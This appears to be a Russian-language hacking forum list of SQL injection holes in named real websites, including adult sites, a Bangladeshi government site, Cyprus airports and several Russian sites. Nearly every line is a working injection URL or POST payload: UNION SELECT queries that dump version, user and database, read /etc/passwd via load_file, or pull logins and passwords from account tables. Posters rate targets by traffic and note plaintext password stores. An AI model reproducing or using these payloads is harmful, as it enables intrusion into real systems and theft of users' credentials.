MSSQL POST SQLi в параметре 'inputString' URL:http://www.cotizalia.com/include/redicabecera.asp Яндекс тИЦ: 10 Google Page Rank: 5/10
Секси http://www.babestare.com/index.php?type=2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6-- 5.1.63-cll:aiwebtoo_cremz@localhost:aiwebtoo_cremzinc
PR=4 По запросу "sex movies" - 3 место в выдаче. База ~43к юзеров, не хешированные пассы, приличный траф.
MySQL: GET SQLi, параметр 'mode' в URL:http://www.sunporno.com/login.php Яндекс тИЦ (CY): 10 Google PageRank (PR): 4/10 VERSION() USER() DATABASE() Еще одна порнушка (тот же вектор) MySQL: GET SQLi, параметр 'mode' в URL:http://www.ah-me.com/channels.php Яндекс тИЦ (CY): 0 Google PageRank (PR): 3/10 MySQL: Error-based Duplicate entry GET SQLi в URL:http://piluli.ru/ Яндекс тИЦ (CY): 600 Google PageRank (PR): 4/10 сложная кэш скуля, вместо [random_string] любые символы, с каждым запросом новые MySQL: GET SQLi параметр 'letter' в URL:http://www.classes.ru/all-spanish/ Яндекс тИЦ (CY): 475 Google PageRank (PR): 2/10
PR: 6 Code: http://www.mofa.[color="red"]gov[/color].bd/lbr/ViewLBR.php?txtUserId=-Canberra%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
PR == 4; PHP: http://wap.indosat.com/produk_detail.php?i=-1+union+select+1,file_priv,3,4,5,6,7,8,9,10,11+from+mysql.user-- ТИЦ == 10, PR == 1; PHP: http://www.debilz.com/index.phtml?id=-352+union+select+concat_ws(0x03a,id,Login,Password),2,3+from+accounts-- PR == 2; PHP: http://sante.ismat.ch/article.php?id=-50+union+select+0,1,load_file('/etc/passwd'),3,4,5,6-- http://sante.ismat.ch/phpinfo.php в помощь.
ТИЦ == 30, PR == 5, DMOZ == true; PHP: http://www.thework.com/watch.php?yid=WsPAY_kpN8c&cat=ololo'+/*!union+all+select+1,2,3,4,load_file('/var/www/html/thework/robots.txt'),6,7,8,9,10,11,12,13,14,15,16,17*/--+h
Code: http://dimdramteatr.ru/news_view.php?id=-12+union+select+1,concat%28user%28%29,0x3a,database%28%29%29,3,4,5-- dimdramteatr_ddt@localhost:dimdramteatr_ddt
Official Website for Larnaka & Pafos International Airports / PR: 5 / тИЦ: 50 Code: http://www.[B]cyprusairports.com.cy[/B]/showpage.php?PageID=198[COLOR=Red][B]+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+m[/B][/COLOR] version: 5.0.96-0ubuntu3-log database: db_hermes user: db_h3rme5_air
Что-то никак не получается реализовать SQL Code: http://il2.aviasibir.ru/mow/?page=pilot&pilotname=lemke'+and+1=1+union+select+1--+m Спасибо!
MySQL: POST SQLi in param 'province_id' in URL:http://adoos.com/l/car Яндекс тИЦ (CY): 10 Google PageRank (PR): 4/10 Траффик Alexa: +0.08% (4 000 000 уников в день) Code: province_id=1' UNION ALL SELECT VERSION()# в базах юзеров пароли в Plain text
http://www.salavat-tur.ru/salavat/?part=news&news_id=-15%20and%201=2%20union%20select%201,2,3,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),5+-- 5.1.41-log [email protected] salavat_tu_db portbld-freebsd7.2
http://www.keyshop.us/Product_list.php?cid=-97+UNION+SELECT+1999,@@version,3999,4999,5999,6999,9997,8999,9999--+ http://www.tie4safe.com/product.php?pid=271+UNION+SELECT+table_name,2999,3999,9999,5999,6999,7999,8999,9999,19990+from+INFORMATION_SCHEMA.TABLES+limit+117,1--+
